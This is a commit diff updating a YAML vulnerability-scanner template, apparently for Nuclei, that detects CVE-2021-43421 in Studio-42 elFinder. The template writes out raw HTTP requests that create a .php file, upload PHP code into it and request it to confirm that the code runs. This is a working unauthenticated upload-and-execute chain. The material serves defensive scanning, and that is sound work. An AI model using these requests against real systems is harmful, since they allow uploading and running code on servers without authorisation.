Update CVE-2021-43421.yaml

2022-11-24 11:09:24 +05:30 · 2022-11-24 11:09:24 +05:30 · f1c9b9802d
parent 47464034f4
commit f1c9b9802d
1 changed files with 22 additions and 21 deletions
--- a/cves/2021/CVE-2021-43421.yaml
+++ b/cves/2021/CVE-2021-43421.yaml
@ -1,49 +1,50 @@
 id: CVE-2021-43421

 info:
-  name: Studio-42 elFinder RCE <2.1.60
+  name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload 
  author: akincibor
  severity: critical
-  description: A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
+  description: |
+    A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
  reference:
    - https://github.com/Studio-42/elFinder/issues/3429
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43421
-  tags: cve,cve2021,rce,unauth,elfinder
+  tags: cve,cve2021,elfinder,unauth,upload,rce

 requests:
  - raw:
      - |
-        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa HTTP/1.1
+        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
-        POST /2/elFinder/php/connector.minimal.php HTTP/1.1
+        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e HTTP/1.1
        Host: {{Hostname}}
-        Accept: application/json, text/javascript, /; q=0.01
-        Accept-Language: en-US,en;q=0.5
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e

      - |
-        GET /2/elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1
+        GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

-    extractors:
-      - type: regex
-        name: hash
-        internal: true
-        group: 1
-        regex:
-          - '"hash"\:"(.*?)"\,'
-
+      - |
+        GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*

    req-condition: true
    matchers:
      - type: dsl
        dsl:
-          - 'contains(body_3, "{{randstr_1}}")'
-          - "status_code_3 == 200"
+          - 'contains(body_3, "{{randstr}}")'
+          - 'contains(body_4, "{{randstr_1}}")'
+          - "status_code == 200"
        condition: and
+
+    extractors:
+      - type: regex
+        name: hash
+        group: 1
+        regex:
+          - '"hash"\:"(.*?)"\,'
+        internal: true